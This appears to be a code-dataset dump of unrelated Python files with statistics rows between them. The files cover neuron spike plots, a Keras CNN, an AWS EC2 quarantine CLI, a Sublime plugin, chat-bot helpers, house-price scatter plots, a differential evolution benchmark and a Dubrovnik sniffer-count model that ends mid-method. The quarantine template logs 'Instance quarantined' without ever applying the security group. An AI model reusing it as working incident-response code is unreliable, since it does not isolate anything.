dp.write_spike_count_table(table_initial_count, table_final_count, './tableSpikeCount.csv', time_intervals_count, rateVec, inputProbVec)
files_list = ['simR1P0.33', 'simR0.33P0.33', 'simR1P1', 'simR0.33P1']
legend_list = ['IR = 1 Hz, SP = 0.33','IR = 0.33 Hz, SP = 0.33','IR = 1 Hz, SP = 1','IR = 0.33 Hz, SP = 1']
time_intervals = [50*10**e for e in np.linspace(0,1.5,15)]
pF.plot_spike_count_evoluiton(files_list, time_intervals, neurons, legend_list = legend_list, saveFig = True)
print('Tau = 2, SP = 0.33, IR = 0.33')
print_synch_evolution('simR0.33P0.33', range(1, neurons), 2)
print('Tau = 5, SP = 0.33, IR = 0.33')
print_synch_evolution('simR0.33P0.33', range(1, neurons), 5)
print('Tau = 10, SP = 0.33, IR = 0.33')
print_synch_evolution('simR0.33P0.33', range(1, neurons), 10)
print('Tau = 2, SP = 1, IR = 0.33')
print_synch_evolution('simR0.33P1', range(1, neurons), 2)
print('Tau = 5, SP = 1, IR = 0.33')
print_synch_evolution('simR0.33P1', range(1, neurons), 5)
print('Tau = 10, SP = 1, IR = 0.33')
print_synch_evolution('simR0.33P1', range(1, neurons), 10)  # was 'simR1P1', a copy-paste slip
print('Tau = 2, SP = 0.33, IR = 1')
print_synch_evolution('simR1P0.33', range(1, neurons), 2)
print('Tau = 5, SP = 0.33, IR = 1')
print_synch_evolution('simR1P0.33', range(1, neurons), 5)
print('Tau = 10, SP = 0.33, IR = 1')
print_synch_evolution('simR1P0.33', range(1, neurons), 10)
print('Tau = 2, SP = 1, IR = 1')
print_synch_evolution('simR1P1', range(1, neurons), 2)
print('Tau = 5, SP = 1, IR = 1')
print_synch_evolution('simR1P1', range(1, neurons), 5)
print('Tau = 10, SP = 1, IR = 1')
print_synch_evolution('simR1P1', range(1, neurons), 10)
| 36.215116 | 136 | 0.688875 | 886 | 6,229 | 4.62754 | 0.189616 | 0.013171 | 0.060244 | 0.014634 | 0.391707 | 0.338049 | 0.264146 | 0.25878 | 0.233171 | 0.233171 | 0 | 0.057931 | 0.185262 | 6,229 | 171 | 137 | 36.426901 | 0.749951 | 0.021673 | 0 | 0.128 | 0 | 0 | 0.12044 | 0.003451 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048 | false | 0 | 0.064 | 0 | 0.144 | 0.264 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cabd66d869fd02374ca8bfaac4b224efa1d798 | 1,377 | py | Python | models/vgg_model.py | wufy1992/FruitRecognition | 541920d694d7416e7551f71b2eba92fe043ba072 | [
"MIT"
] | 1 | 2021-04-14T15:52:13.000Z | 2021-04-14T15:52:13.000Z | models/vgg_model.py | wufy1992/FruitRecognition | 541920d694d7416e7551f71b2eba92fe043ba072 | [
"MIT"
] | 1 | 2021-06-14T13:02:04.000Z | 2021-06-14T13:02:04.000Z | models/vgg_model.py | wufy1992/FruitRecognition | 541920d694d7416e7551f71b2eba92fe043ba072 | [
"MIT"
] | 1 | 2021-05-16T04:11:02.000Z | 2021-05-16T04:11:02.000Z | #!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Activation, BatchNormalization
from keras.layers.core import Dense, Dropout, Flatten
def get_model(input_dim, category_num):
"""
Build Convolution Neural Network
args : nb_classes (int) number of classes
returns : model (keras NN) the Neural Net model
"""
    # input_shape below is channels_last (height, width, 3), so the channel axis is -1
    chanDim = -1
model = Sequential()
model.add(Conv2D(32, (3, 3), padding="same", input_shape=(input_dim[0], input_dim[1], 3)))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(64, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(category_num, activation='softmax'))
return model
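# A minimal usage sketch (the hyperparameters below are illustrative, not taken
# from this repository):
#     model = get_model(input_dim=(96, 96), category_num=10)
#     model.compile(loss='categorical_crossentropy', optimizer='adam',
#                   metrics=['accuracy'])
#     model.summary()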
| 33.585366 | 95 | 0.69281 | 186 | 1,377 | 5.075269 | 0.360215 | 0.152542 | 0.059322 | 0.055085 | 0.483051 | 0.483051 | 0.483051 | 0.483051 | 0.450212 | 0.450212 | 0 | 0.036207 | 0.157589 | 1,377 | 40 | 96 | 34.425 | 0.777586 | 0.122004 | 0 | 0.518519 | 0 | 0 | 0.032939 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.185185 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cb651503bbc5146cbb3c32633cdc86dfc9199c | 1,843 | py | Python | home-machines/.vim/python-template.py | tdowg1/dotfiles | 215e151748776a07d8fe55ddfd6773aed7169ad3 | [
"MIT"
] | 2 | 2015-07-24T18:28:03.000Z | 2017-04-20T13:40:59.000Z | home-machines/.vim/python-template.py | tdowg1/dotfiles | 215e151748776a07d8fe55ddfd6773aed7169ad3 | [
"MIT"
] | null | null | null | home-machines/.vim/python-template.py | tdowg1/dotfiles | 215e151748776a07d8fe55ddfd6773aed7169ad3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import click
import boto3
import logging
import datetime
import sys
from pprint import pformat
from pprint import pprint
logger = logging.getLogger()
def tags_to_map(tags):
tag_map = {}
for tag in tags:
tag_map[tag['Key']] = tag['Value']
return tag_map
def abc(ip, ec2):
    # Look up the instance by private IP ('instance' was undefined in the template)
    instances = list(ec2.instances.filter(
        Filters=[{"Name": "private-ip-address", "Values": [ip]}]))
    instance = instances[0]
    tag_map = tags_to_map(instance.tags)
    logger.debug(tag_map)
    return instance, tag_map
def ghi(ec2, instance):
    logger.info("Locating quarantine security group")
    groups = list(ec2.security_groups.filter(Filters=[{"Name": "tag-key", "Values": ["Quarantine"]},
                                                      {"Name": "vpc-id", "Values": [instance.vpc_id]}
                                                      ]))
    if not groups:  # the template tested an undefined 'group_id' here
        logger.error("Could not identify a quarantine security group")
        sys.exit(5)
@click.command()
@click.option("--ip", "-i", help="IP Address to quarantine", required=True)
@click.option("--loglevel", "-l", type=click.Choice(['DEBUG','INFO','WARN','ERROR'], case_sensitive=True), default="INFO")
def jkl(ip, loglevel):
#logging.basicConfig(filename=__file__ + ".log")
logging.basicConfig()
logger.setLevel(loglevel)
logger.info(datetime.datetime.now().isoformat())
ec2 = boto3.resource("ec2")
ec2_client = boto3.client("ec2")
    instance, tag_map = abc(ip, ec2)
logger.info("Instance located")
ghi(ec2, instance)
logger.info("Instance quarantined")
if "aws:autoscaling:groupName" in tag_map:
# Set the instance to standby to start automatic recovery
autoscaling = boto3.client("autoscaling")
autoscaling.enter_standby(InstanceIds=[instance.instance_id],
AutoScalingGroupName=tag_map["aws:autoscaling:groupName"],
ShouldDecrementDesiredCapacity=False)
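# Hypothetical invocation (the script name depends on what this template is saved as):
#     ./quarantine.py --ip 10.0.0.5 --loglevel DEBUG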
if __name__ == "__main__":
jkl()
| 30.213115 | 122 | 0.620184 | 216 | 1,843 | 5.143519 | 0.430556 | 0.048605 | 0.028803 | 0.036004 | 0.043204 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010753 | 0.243082 | 1,843 | 60 | 123 | 30.716667 | 0.785663 | 0.067282 | 0 | 0 | 0 | 0 | 0.146853 | 0.029138 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.155556 | 0 | 0.288889 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cc71d8c4f3cf2e925f127a0d7c8d6af35f1aa2 | 1,452 | py | Python | EthanBrown.SublimeText2.UtilPackages/tools/PackageCache/RecentActiveFiles/RecentActiveFiles.py | michaelray/Iristyle-ChocolateyPackages | 5051538253ff095af4b64d469137b23420f28be0 | [
"MIT"
] | 18 | 2015-01-14T13:36:47.000Z | 2020-10-22T19:53:57.000Z | EthanBrown.SublimeText2.UtilPackages/tools/PackageCache/RecentActiveFiles/RecentActiveFiles.py | michaelray/Iristyle-ChocolateyPackages | 5051538253ff095af4b64d469137b23420f28be0 | [
"MIT"
] | 12 | 2015-04-13T13:56:14.000Z | 2017-02-04T08:35:35.000Z | EthanBrown.SublimeText2.UtilPackages/tools/PackageCache/RecentActiveFiles/RecentActiveFiles.py | michaelray/Iristyle-ChocolateyPackages | 5051538253ff095af4b64d469137b23420f28be0 | [
"MIT"
] | 30 | 2015-01-20T12:32:53.000Z | 2019-01-26T12:39:02.000Z | import sublime_plugin
import os
class RecentActiveFilesEventListener(sublime_plugin.EventListener):
def on_activated(self, view):
if view.file_name():
view.window().run_command("recent_active_files", { "file_name": view.file_name() })
class RecentActiveFilesCommand(sublime_plugin.WindowCommand):
def __init__(self, window):
sublime_plugin.WindowCommand.__init__(self, window)
self.recent_active_files = []
def unshift(self, file_name):
if file_name in self.recent_active_files:
self.recent_active_files.remove(file_name)
self.recent_active_files.insert(0, file_name)
  def path_from_project(self, path):
for folder in self.window.folders():
path = path.replace(folder + '/', '', 1)
return path
def run(self, file_name=None):
if file_name:
self.unshift(file_name)
else:
if self.window.active_view() is not None:
active_file = self.window.active_view().file_name()
        files = list(filter(lambda f: f != active_file, self.recent_active_files))  # list() so on_done can index it
else:
files = self.recent_active_files
      items = [[os.path.basename(f), self.path_from_project(f)] for f in files]
def on_done(index):
if index >= 0:
self.window.open_file(files[index])
self.window.show_quick_panel(items, on_done)
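# A hypothetical key binding to open the panel from a *.sublime-keymap file:
#     { "keys": ["ctrl+alt+p"], "command": "recent_active_files" }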
| 35.414634 | 95 | 0.632231 | 179 | 1,452 | 4.837989 | 0.296089 | 0.101617 | 0.137413 | 0.145497 | 0.060046 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00282 | 0.267218 | 1,452 | 40 | 96 | 36.3 | 0.81109 | 0 | 0 | 0.0625 | 0 | 0 | 0.019972 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.0625 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cdbc45f9b78516ff3de6e214b3734502e88f2e | 2,595 | py | Python | phial/utils.py | sedders123/phial | 1a8d7a2bdbf37cc4b44252e7a783f51ff88689cb | [
"MIT"
] | 13 | 2017-07-01T23:30:36.000Z | 2021-04-16T09:32:23.000Z | phial/utils.py | sedders123/phial | 1a8d7a2bdbf37cc4b44252e7a783f51ff88689cb | [
"MIT"
] | 468 | 2017-07-02T16:03:02.000Z | 2022-03-31T16:14:20.000Z | phial/utils.py | sedders123/phial | 1a8d7a2bdbf37cc4b44252e7a783f51ff88689cb | [
"MIT"
] | 5 | 2018-06-01T21:40:37.000Z | 2018-12-09T21:07:38.000Z | """Helper utilities for phial."""
import re
from inspect import Parameter, Signature, signature
from typing import Any, Callable, Dict, List, Optional
from phial.errors import ArgumentTypeValidationError, ArgumentValidationError
from phial.wrappers import Message
def validate_kwargs(func: Callable, kwargs: Dict[str, str]) -> Dict[str, Any]:
"""Validate kwargs match a functions signature."""
func_params = signature(func).parameters
validated_kwargs: Dict[str, Any] = {}
for key in func_params.values():
value = None
if key.default is not Parameter.empty:
value = key.default
if value is None and key.name not in kwargs:
raise ArgumentValidationError(
"Parameter {0} not provided to {1}".format(key.name, func.__name__)
)
elif key.name in kwargs:
value = kwargs[key.name]
if key.annotation is not Signature.empty:
try:
value = key.annotation(value)
except ValueError:
raise ArgumentTypeValidationError(
"{0} could not be converted to {1}".format(
value, key.annotation.__name__
)
)
validated_kwargs[key.name] = value
return validated_kwargs
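# Doctest-style sketch of the validation above (the handler is hypothetical):
#     >>> def handler(count: int, name="bot"): ...
#     >>> validate_kwargs(handler, {"count": "3"})
#     {'count': 3, 'name': 'bot'}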
def parse_help_text(help_text: str) -> str:
"""Parse help text."""
    NEW_LINE_SEPARATOR = "<__NEW_LINE_SEPARATOR__>"
    # Strip excess whitespace
    help_text = help_text.strip()
    # Remove single new lines
    help_text = help_text.replace("\n", NEW_LINE_SEPARATOR)
    help_text = help_text.replace(NEW_LINE_SEPARATOR * 2, "\n")
    help_text = help_text.replace(NEW_LINE_SEPARATOR, "")
# Remove extra spaces
help_text = re.sub(r"(^[ \t]+|[ \t]+)", " ", help_text, flags=re.M)
return help_text
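# Sketch of the newline handling above: single newlines join lines into one
# paragraph, double newlines survive as one newline (note the trailing space
# before the single newline, which keeps the joined words separated):
#     >>> parse_help_text("adds two numbers \ntogether\n\nUsage: add 1 2")
#     'adds two numbers together\nUsage: add 1 2'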
def parse_slack_output(slack_rtm_output: List[Dict]) -> Optional["Message"]:
"""Parse Slack output."""
output_list = slack_rtm_output
    if output_list:
for output in output_list:
if output and "text" in output:
bot_id = None
team = None
if "team" in output:
team = output["team"]
if "bot_id" in output:
bot_id = output["bot_id"]
return Message(
output["text"],
output["channel"],
output["user"],
output["ts"],
team,
bot_id,
)
return None
| 33.269231 | 83 | 0.576108 | 294 | 2,595 | 4.891156 | 0.309524 | 0.077886 | 0.041725 | 0.055633 | 0.070236 | 0.054242 | 0.054242 | 0.054242 | 0 | 0 | 0 | 0.003436 | 0.327168 | 2,595 | 77 | 84 | 33.701299 | 0.82016 | 0.068593 | 0 | 0 | 0 | 0 | 0.066416 | 0.010025 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.087719 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d0bf1cab823cb7a7dc7f6aa4476e08694bf314 | 1,748 | py | Python | eda/numerical_data/scatter_plot.py | kmsk99/data_science_toolbar | d139b83d4547b00249d35ba76da5c063c80f4bc2 | [
"MIT"
] | null | null | null | eda/numerical_data/scatter_plot.py | kmsk99/data_science_toolbar | d139b83d4547b00249d35ba76da5c063c80f4bc2 | [
"MIT"
] | null | null | null | eda/numerical_data/scatter_plot.py | kmsk99/data_science_toolbar | d139b83d4547b00249d35ba76da5c063c80f4bc2 | [
"MIT"
] | null | null | null | fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(
nrows=3, ncols=2, figsize=(16, 13))
OverallQual_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['OverallQual']], axis=1)
sns.regplot(x='OverallQual', y='SalePrice',
data=OverallQual_scatter_plot, scatter=True, fit_reg=True, ax=ax1)
TotalBsmtSF_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['TotalBsmtSF']], axis=1)
sns.regplot(x='TotalBsmtSF', y='SalePrice',
data=TotalBsmtSF_scatter_plot, scatter=True, fit_reg=True, ax=ax2)
GrLivArea_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['GrLivArea']], axis=1)
sns.regplot(x='GrLivArea', y='SalePrice',
data=GrLivArea_scatter_plot, scatter=True, fit_reg=True, ax=ax3)
GarageCars_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['GarageCars']], axis=1)
sns.regplot(x='GarageCars', y='SalePrice',
data=GarageCars_scatter_plot, scatter=True, fit_reg=True, ax=ax4)
FullBath_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['FullBath']], axis=1)
sns.regplot(x='FullBath', y='SalePrice', data=FullBath_scatter_plot,
scatter=True, fit_reg=True, ax=ax5)
YearBuilt_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['YearBuilt']], axis=1)
sns.regplot(x='YearBuilt', y='SalePrice',
data=YearBuilt_scatter_plot, scatter=True, fit_reg=True, ax=ax6)
YearRemodAdd_scatter_plot = pd.concat(
[df_train['SalePrice'], df_train['YearRemodAdd']], axis=1)
YearRemodAdd_scatter_plot.plot.scatter('YearRemodAdd', 'SalePrice')
# Target Feature "SalePrice"와 가장 밀접한 연관이 있다고 판단됐던 변수들의 Scatter Plot을 그립니다.
# OverallQual, GarageCars, Fullbath와 같은 변수들은 실제로는 범주형 데이터의 특징을 보인다고 할 수 있습니다. (등급, 갯수 등을 의미하기 때문)
| 52.969697 | 97 | 0.712243 | 247 | 1,748 | 4.846154 | 0.275304 | 0.128655 | 0.076023 | 0.111111 | 0.496241 | 0.41604 | 0.41604 | 0.41604 | 0.245614 | 0 | 0 | 0.016469 | 0.131579 | 1,748 | 32 | 98 | 54.625 | 0.772069 | 0.09611 | 0 | 0 | 0 | 0 | 0.168675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d1ba48e81f62271e0ca0c8ffd41e85b578380d | 2,544 | py | Python | FIRST/DE/report.py | zdoryk/TSI | 22c9baf919ef85e1d1887a5978f81c0bff9651d6 | [
"MIT"
] | 1 | 2022-03-13T10:49:36.000Z | 2022-03-13T10:49:36.000Z | FIRST/DE/report.py | zdoryk/TSI | 22c9baf919ef85e1d1887a5978f81c0bff9651d6 | [
"MIT"
] | null | null | null | FIRST/DE/report.py | zdoryk/TSI | 22c9baf919ef85e1d1887a5978f81c0bff9651d6 | [
"MIT"
] | null | null | null | from fitness_functions import sphere, f2, rosenbrock, griewank, rastrigin, \
    np  # brown, schwefel, zakharov, schaffersf6 were imported but never used
from matplotlib import pyplot as plt
from DEvolution import DEvolution
DIMENSIONS = 20
POPULATION = [30]
f = 0.6
cr = 0.6
PRESETS = {
'Sphere': {
'accuracy': 0.0001,
'min_x': [-100.0] * DIMENSIONS,
'max_x': [100.0] * DIMENSIONS,
'function': sphere,
},
'F2': {
'accuracy': 0.0001,
'min_x': [-100.0] * DIMENSIONS,
'max_x': [100.0] * DIMENSIONS,
'function': f2,
},
'Rosenbrock': {
'accuracy': 30,
'min_x': [-2.048] * DIMENSIONS,
'max_x': [2.048] * DIMENSIONS,
'function': rosenbrock,
},
'Griewank': {
'accuracy': 0.1,
'min_x': [-600.0] * DIMENSIONS,
'max_x': [600.0] * DIMENSIONS,
'function': griewank,
},
'Rastrigin': {
'accuracy': 30,
'min_x': [-5.12] * DIMENSIONS,
'max_x': [5.12] * DIMENSIONS,
'function': rastrigin,
},
}
ITERATIONS = 500
for pop in POPULATION:
for k, v in PRESETS.items():
L_G_best_fitness_iterations, U_G_best_fitness_iterations = [1000, 1000]
while L_G_best_fitness_iterations > v['accuracy'] or U_G_best_fitness_iterations > v['accuracy']:
L_G_best_fitness_iterations, linear_fitness_list = \
DEvolution(pop, v['min_x'], v['max_x'], v['function'], f=f, cr=cr).run_iterations(ITERATIONS, linear=True)
U_G_best_fitness_iterations, usual_fitness_list = \
DEvolution(pop, v['min_x'], v['max_x'], v['function'], f=f, cr=cr).run_iterations(ITERATIONS)
print(k, v['accuracy'])
print(f'Linear: {L_G_best_fitness_iterations}')
print(f'Usual: {U_G_best_fitness_iterations}')
fig, (ax1, ax2) = plt.subplots(2, 1, constrained_layout=True)
ax1.plot(np.arange(50, ITERATIONS), linear_fitness_list[51:])
ax1.set_title(f'Linear')
ax1.set_xlabel('Iterations')
ax1.set_ylabel('Best fitness value')
ax2.plot(np.arange(50, ITERATIONS), usual_fitness_list[51:])
ax2.set_title(f'Usual')
ax2.set_xlabel('Iterations')
ax2.set_ylabel('Best fitness value')
fig.suptitle(f'{k}', fontsize=16)
plt.savefig(f'plots/f_06_cr_06/{k}_{pop}-Line{L_G_best_fitness_iterations}-Usual{U_G_best_fitness_iterations}.png')
# plt.show()
# np.savetxt(f'results/{k}_PSO_RESULTS.csv', fitness_list, header=f'{k}', delimiter='\n')
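# For reference, the classic DE/rand/1/bin update that DEvolution presumably
# implements, given its f and cr parameters (an assumption, not verified here):
#     v_i = x_r1 + f * (x_r2 - x_r3)          # mutation
#     u_ij = v_ij if rand() < cr else x_ij    # binomial crossover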
| 33.473684 | 123 | 0.601808 | 331 | 2,544 | 4.386707 | 0.280967 | 0.090909 | 0.082645 | 0.151515 | 0.426309 | 0.258953 | 0.177686 | 0.177686 | 0.177686 | 0.177686 | 0 | 0.053479 | 0.242925 | 2,544 | 75 | 124 | 33.92 | 0.700415 | 0.038522 | 0 | 0.126984 | 0 | 0 | 0.191315 | 0.064318 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d3cb72310afffb5bc84f6294c780d65c04f286 | 11,232 | py | Python | python/model_dubrovnik.py | physycom/slides | ff73de94997e39673d6d5c82b1bb4d9d0069fee6 | [
"BSD-3-Clause"
] | 1 | 2020-05-29T09:40:19.000Z | 2020-05-29T09:40:19.000Z | python/model_dubrovnik.py | physycom/slides | ff73de94997e39673d6d5c82b1bb4d9d0069fee6 | [
"BSD-3-Clause"
] | null | null | null | python/model_dubrovnik.py | physycom/slides | ff73de94997e39673d6d5c82b1bb4d9d0069fee6 | [
"BSD-3-Clause"
] | 2 | 2022-01-27T08:53:19.000Z | 2022-03-28T07:14:56.000Z | #! /usr/bin/env python3
import os
import json
import argparse
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import datetime, timedelta
import mysql.connector
from collections import defaultdict
##########################
#### log function ########
##########################
import logging
logger = logging.getLogger('mod_du')
#############################
#### model dubrovnik class ####
#############################
class model_dubrovnik():
def __init__(self, config):
self.logger = logger
self.cnt = pd.DataFrame()
self.date_format = '%Y-%m-%d %H:%M:%S'
self.time_format = '%H:%M:%S'
self.rates_dt = 15 * 60
self.config = config
self.station_map = {}
self.data = pd.DataFrame()
with open(os.path.join(os.environ['WORKSPACE'], 'slides', 'vars', 'extra', 'dubrovnik_router.json')) as sin:
self.st_info = json.load(sin)
st_ser2id = { st['serial'] : st['id'] for st in self.st_info }
self.station_map = config['station_mapping']
self.station_mapid = { k : [ st_ser2id[si] for si in v ] for k,v in self.station_map.items() }
self.source_map = { i : k for k,v in self.station_map.items() for i in v }
self.source_mapid = { i : k for k,v in self.station_mapid.items() for i in v }
def full_table(self, start, stop, tag, resampling=None):
start = pd.to_datetime(start).tz_localize('Europe/Rome').tz_convert('utc')
stop = pd.to_datetime(stop).tz_localize('Europe/Rome').tz_convert('utc')
if not tag in self.station_map:
raise Exception(f'Model DU tag {tag} not in sniffer-source map')
if not tag in self.cnt.columns:
data = self.count_raw(start, stop)
else:
data = self.cnt
    if resampling is not None and resampling < self.rates_dt:
dtot = data.sum()
      data = data.resample(f'{resampling}s').interpolate(limit_direction='both')
data = data * dtot / data.sum()
resampling_min = resampling // 60
start_date = start.replace(
minute=resampling_min*(start.minute//resampling_min),
second=0
)
stop_date = stop - timedelta(seconds=1)
stop_date = stop_date.replace(
minute=resampling_min*(stop_date.minute//resampling_min),
second=0
)
fullt = pd.date_range(start_date, stop_date, freq=f'{resampling}s' )
    data = data.reindex(fullt).interpolate(limit_direction='both')
data = data[ (data.index >= start) & (data.index < stop) ]
data = data.tz_convert('Europe/Rome').tz_localize(None)
self.cnt = self.cnt.drop(columns=tag)
return data[[tag]]
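  # Worked example of the rescaling in full_table (hypothetical counts): splitting
  # a 15-minute bin of 30 counts into three 5-minute bins by interpolation
  # generally distorts the column totals, so `data * dtot / data.sum()` rescales
  # each column back to its pre-resampling total.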
def count_raw(self, start, stop):
"""
Perform device id counting with fine temporal scale
"""
df = self.get_data(start, stop)
fine_freq = f'{self.rates_dt}s'
df['wday'] = [ t.strftime('%a') for t in df.index ]
df['date'] = df.index.date
df['time'] = df.index.time
df['source'] = df.station_id.apply(lambda x: self.source_mapid[x])
#print(df)
tnow = datetime.now()
cnts = pd.DataFrame(index=pd.date_range(start, stop, freq=fine_freq))
#cnts = cnts.tz_localize('Europe/Rome')
for station, dfg in df.groupby(['source']):
#print(station, len(dfg))
s = pd.Series(dfg['device_uid'], index=dfg.index)
dfu = pd.DataFrame(s.groupby(pd.Grouper(freq=fine_freq)).value_counts())
dfu.columns = [station]
dfu = dfu.reset_index()
dfu = dfu.set_index('date_time')
dfu = dfu.groupby('date_time')[['device_uid']].count()
dfu.columns = [station]
# print(dfu)
cnts[station] = np.nan
mrg = cnts[[station]]
# print(mrg)
mrg = pd.merge(mrg, dfu, left_index=True, right_index=True, how='left', suffixes=('_cnts', ''))
# print('merge\n', mrg)
cnts[station] = mrg[f'{station}']
# fix null/empty/nan/missing values
#cnts[ cnts == 0 ] = np.nan
#cnts = cnts.interpolate(limit=10000, limit_direction='both')
cnts = cnts.fillna(0)
cnts.index.name = 'time'
tcounting = datetime.now() - tnow
self.logger.debug(f'Counting done in {tcounting}')
#print(cnts)
self.cnt = cnts.astype(int)
return self.cnt
def get_data(self, start, stop):
try:
config = self.config['mysql']
db = mysql.connector.connect(
host = config['host'],
port = config['port'],
user = config['user'],
passwd = config['pwd'],
database = config['db']
)
cursor = db.cursor()
id_list = sum(self.station_mapid.values(), [])
start_utc = start.strftime(self.date_format)
stop_utc = stop.strftime(self.date_format)
query = f"""
SELECT
de.eventOccurredAt as date_time,
de.id_device as station_id,
de.eventClientiId as device_uid
FROM
DubrovnikPma.DevicesEvents de
WHERE
(de.eventOccurredAt >= '{start_utc}' AND de.eventOccurredAt < '{stop_utc}')
        AND (de.id_device IN ({','.join(str(i) for i in id_list)}))
"""
#print(query)
tquery = datetime.now()
cursor.execute(query)
result = cursor.fetchall()
tquery = datetime.now() - tquery
self.logger.info(f'Received {len(result)} mysql data in {tquery}')
if len(result) == 0:
        raise Exception(f'[mod_du] Empty mysql query result')
df1 = pd.DataFrame(result)
df1.columns = cursor.column_names
df1.index = pd.to_datetime(df1.date_time)
df1 = df1.tz_localize('utc')
df = df1
return df
except Exception as e:
      raise Exception(f'[mod_du] Query failed : {e}')
def get_station_metadata(self):
# mysql
config = self.config['mysql']
db = mysql.connector.connect(
host = config['host'],
port = config['port'],
user = config['user'],
passwd = config['pwd'],
database = config['db']
)
cursor = db.cursor()
query = f"""
SELECT
ds.id as id,
ds.name as name,
ds.serial as serial,
ds.lat as lat,
ds.lng as lon,
ds.status as status
FROM
Devices ds
"""
#print(query)
tquery = datetime.now()
cursor.execute(query)
result = cursor.fetchall()
tquery = datetime.now() - tquery
self.logger.debug(f'Received {len(result)} mysql data in {tquery}')
if len(result) == 0:
      raise Exception(f'[mod_du] Empty mysql query result')
df1 = pd.DataFrame(result)
df1.columns = cursor.column_names
return df1
def map_station_to_source(self):
stations = pd.DataFrame.from_dict(self.st_info)
sourcemap = defaultdict(lambda: 'none')
sourcemap.update(self.source_mapid)
#stations = stations.set_index('serial').loc[ self.source_map.keys(), :].reset_index()
stations['source'] = stations.id.apply(lambda x: sourcemap[x])
stations['color'] = 'blue'
stations.loc[stations.source == 'none', 'color'] = 'red'
# stations['color'] = stations.serial.apply(lambda x: clustercol[clustermap[x]])
print(stations)
#stations = stations[stations.cluster != 'none']
map_center = stations[['lat', 'lon']].mean().values
simconf = os.path.join(os.environ['WORKSPACE'], 'slides', 'work_ws', 'output', 'wsconf_sim_dubrovnik.json')
with open(simconf) as sin:
sconf = json.load(sin)
sources = pd.DataFrame.from_dict(sconf['sources']).transpose().dropna(subset=['source_location'])
sources['name'] = sources.index.str.replace('_IN', '')
sources.index = sources['name']
sources['lat'] = sources.source_location.apply(lambda x: x['lat'])
sources['lon'] = sources.source_location.apply(lambda x: x['lon'])
sources['type'] = 'synth'
sources.loc[ self.station_map.keys() , 'type'] = 'data'
colors = { 'synth':'red', 'data':'blue'}
sources['color'] = sources.type.apply(lambda t: colors[t])
#sources[['lat', 'lon']] = sources.source_location.apply(lambda x: { 'lat':x['lat'], 'lon':x['lon'] })
sources = sources[['lat', 'lon', 'name', 'color']]
print(sources)
print(sources.columns)
import folium
